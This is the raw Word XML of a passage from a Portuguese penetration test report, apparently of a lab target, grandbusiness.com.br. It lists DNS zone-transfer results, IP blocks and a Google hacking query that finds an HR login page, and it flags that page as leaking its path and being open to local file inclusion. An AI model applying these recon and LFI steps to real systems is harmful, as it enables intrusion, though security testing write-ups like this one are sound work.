        <w:t xml:space="preserve"> de zona com isso foi possível conseguir acesso a todas as entradas DNS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C07F3F" w:rsidRPr="00B876B2" w14:paraId="1B5DC3CD" w14:textId="77777777" w:rsidTr="00F16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14:paraId="3648A138" w14:textId="60183BEB" w:rsidR="00C07F3F" w:rsidRPr="00B876B2" w:rsidRDefault="00C07F3F" w:rsidP="00C07F3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ferência de Zona</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00B876B2" w14:paraId="1043A2D7" w14:textId="77777777" w:rsidTr="00B87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14:paraId="772D5CDF" w14:textId="3EE88241" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ftp.grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2250C934" w14:textId="78D9D891" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B2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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>173.45.93.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00B876B2" w14:paraId="7DCDD198" w14:textId="77777777" w:rsidTr="00B87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14:paraId="0DCAC882" w14:textId="58563486" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>infrasecreta.grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="377AD1C2" w14:textId="7E29F0A3" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>173.45.93.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00B876B2" w14:paraId="330B5D2B" w14:textId="77777777" w:rsidTr="00B87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14:paraId="5BEEB76B" w14:textId="2A019600" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>mail.grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FFF5FCE" w14:textId="19E45059" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B2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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>209.190.1.134</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00B876B2" w14:paraId="06686C67" w14:textId="77777777" w:rsidTr="00B87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14:paraId="560213DC" w14:textId="66EB31B5" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>intranet.grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28C0C593" w14:textId="5E3856D7" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>209.190.1.134</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00B876B2" w14:paraId="1F517713" w14:textId="77777777" w:rsidTr="00B87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14:paraId="6F135048" w14:textId="6CA89685" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>firewall.grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52FBC215" w14:textId="32686287" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B2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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>209.190.1.134</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00B876B2" w14:paraId="6E085474" w14:textId="77777777" w:rsidTr="00B87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14:paraId="1351C668" w14:textId="0973087B" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>gw.grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43354797" w14:textId="6998A883" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>173.45.93.17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00B876B2" w14:paraId="463C3FE4" w14:textId="77777777" w:rsidTr="00B87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14:paraId="509CD5DC" w14:textId="676D989F" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>intranet.grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BC52C2B" w14:textId="208590C5" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B2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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>209.190.1.134</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00B876B2" w14:paraId="6E552C6C" w14:textId="77777777" w:rsidTr="00B87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14:paraId="106BF89B" w14:textId="7206D87B" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>card.grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="192CFF91" w14:textId="3F0F8D9D" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>209.190.1.134</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00B876B2" w14:paraId="1AE9D2EA" w14:textId="77777777" w:rsidTr="00B87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14:paraId="549627C4" w14:textId="5C8BE6CC" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>mail.grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F805FD9" w14:textId="52B894C7" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B2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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>209.190.1.134</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00B876B2" w14:paraId="1C174C04" w14:textId="77777777" w:rsidTr="00B87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14:paraId="174D0EA3" w14:textId="7A533BDE" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ns1.grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02373C77" w14:textId="0E3080D8" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>173.45.93.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00B876B2" w14:paraId="6EDC6BE9" w14:textId="77777777" w:rsidTr="00B87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14:paraId="44CC046E" w14:textId="58FFE657" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ns2.grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61D2CBAC" w14:textId="75CB9D2E" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B2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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>173.45.93.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00B876B2" w14:paraId="4A775207" w14:textId="77777777" w:rsidTr="00B87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14:paraId="1924AF1A" w14:textId="373822D0" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>rh.grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F5E29D3" w14:textId="1F59EF30" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>209.190.1.134</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="005E6338" w14:paraId="09CA900B" w14:textId="77777777" w:rsidTr="00B87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14:paraId="5E92B03B" w14:textId="2D60BFF4" w:rsidR="00B876B2" w:rsidRPr="005E6338" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>www.grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C7FB188" w14:textId="73B0BC65" w:rsidR="00B876B2" w:rsidRPr="005E6338" w:rsidRDefault="00B876B2" w:rsidP="00B876B2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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>173.45.93.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7146A03F" w14:textId="4DE471F2" w:rsidR="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00940DE4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Aqui podemos notar que vários serviços se encontram no mesmo servidor visto que vários subdomínios responde para o mesmo endereço IP.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Também encontramos um outro range de IP que ao consultar retornava outro bloco de IP de responsabilidade do GRANDBUSINESS.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8720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00B876B2" w14:paraId="13264175" w14:textId="77777777" w:rsidTr="00B87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14:paraId="6A45CF15" w14:textId="4FF42954" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Blocos de IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00B876B2" w14:paraId="389F7F3A" w14:textId="77777777" w:rsidTr="00B87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14:paraId="3DA9DD67" w14:textId="77777777" w:rsidR="00B876B2" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>173.45.93.16 - 173.45.93.23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B876B2" w:rsidRPr="00776B5A" w14:paraId="197A0C78" w14:textId="77777777" w:rsidTr="00B876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14:paraId="59E0A07F" w14:textId="77777777" w:rsidR="00B876B2" w:rsidRPr="00776B5A" w:rsidRDefault="00B876B2" w:rsidP="00B876B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6B2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>209.190.1.128 - 209.190.1.135</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E3F4070" w14:textId="712D19DB" w:rsidR="005E6338" w:rsidRDefault="005E6338" w:rsidP="00940DE4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64E2623E" w14:textId="77777777" w:rsidR="00B876B2" w:rsidRPr="00776B5A" w:rsidRDefault="00B876B2" w:rsidP="00940DE4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7C0BC7F6" w14:textId="62644E75" w:rsidR="00776B5A" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00B876B2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6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squisa publica usando a técnica de Google </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65D4EAF5" w14:textId="4072669D" w:rsidR="00C9101E" w:rsidRDefault="00B876B2" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Consulta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720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C9101E" w:rsidRPr="005F56A5" w14:paraId="1A22B47A" w14:textId="77777777" w:rsidTr="00C9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14:paraId="24CE51BE" w14:textId="77777777" w:rsidR="00C9101E" w:rsidRPr="005F56A5" w:rsidRDefault="00C9101E" w:rsidP="008B3E79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01E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>site:grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EC3BA8E" w14:textId="0897041A" w:rsidR="00C9101E" w:rsidRPr="005F56A5" w:rsidRDefault="00B876B2" w:rsidP="00940DE4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6B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Aplicação encontrada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720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C9101E" w14:paraId="7DA5B56F" w14:textId="77777777" w:rsidTr="00C9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14:paraId="46A6876A" w14:textId="77777777" w:rsidR="00C9101E" w:rsidRPr="00C9101E" w:rsidRDefault="00C9101E" w:rsidP="00B27A6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101E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>http://rh.grandbusiness.com.br/index.php?page=login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="132AC4AE" w14:textId="40D1AB54" w:rsidR="005E6338" w:rsidRDefault="005E6338" w:rsidP="00940DE4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1939D49A" w14:textId="20F6479C" w:rsidR="005E6338" w:rsidRPr="00B876B2" w:rsidRDefault="005E6338" w:rsidP="00B876B2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6B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Analisando a Aplicação encontrada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206D6CDE" w14:textId="7363DCBC" w:rsidR="005E6338" w:rsidRDefault="005E6338" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F56A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://rh.grandbusiness.com.br/index.php?page=login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F70EC3" w14:textId="2CFB7681" w:rsidR="005E6338" w:rsidRDefault="005E6338" w:rsidP="00940DE4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plicaçã</w:t>
      </w:r>
      <w:r w:rsidR="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o foi criada na linguagem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP</w:t>
      </w:r>
      <w:r w:rsidR="00E42214">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.3.2</w:t>
      </w:r>
      <w:r w:rsidR="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WebS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>er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do é APACHE</w:t>
      </w:r>
      <w:r w:rsidR="00E42214">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.2.16</w:t>
      </w:r>
      <w:r w:rsidR="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> como podemos verificar no reconhecimento feito abaixo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC65A40" w14:textId="0F410D70" w:rsidR="005E6338" w:rsidRDefault="005929B3" w:rsidP="00940DE4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DAD4C8A" wp14:editId="7967171C">
            <wp:extent cx="5400040" cy="1815465"/>
            <wp:effectExtent l="0" t="0" r="1016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6-06-17 at 13.37.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D8E7" w14:textId="4B311E5C" w:rsidR="00E42214" w:rsidRDefault="005E6338" w:rsidP="00940DE4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ando a o site do RH percebemos que ele passa parâmetros via GET </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B876B2" w:rsidRPr="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ndex.php?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b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esses parâmetros não são bem tratados pois ao manipular os valores ele retorna erro permitindo descobrir o </w:t>
      </w:r>
      <w:r w:rsidR="00B876B2" w:rsidRPr="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> da aplicação além de ser vulnerável a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LF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C4884C" w14:textId="77777777" w:rsidR="00B876B2" w:rsidRDefault="00E42214" w:rsidP="00940DE4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BC0DFA4" wp14:editId="69C7E965">
            <wp:extent cx="5400040" cy="282575"/>
            <wp:effectExtent l="0" t="0" r="1016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6-06-17 at 13.59.5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338">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B876B2" w:rsidRPr="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PATH: /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B876B2" w:rsidRPr="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B876B2" w:rsidRPr="00B876B2">
        <w:rPr>
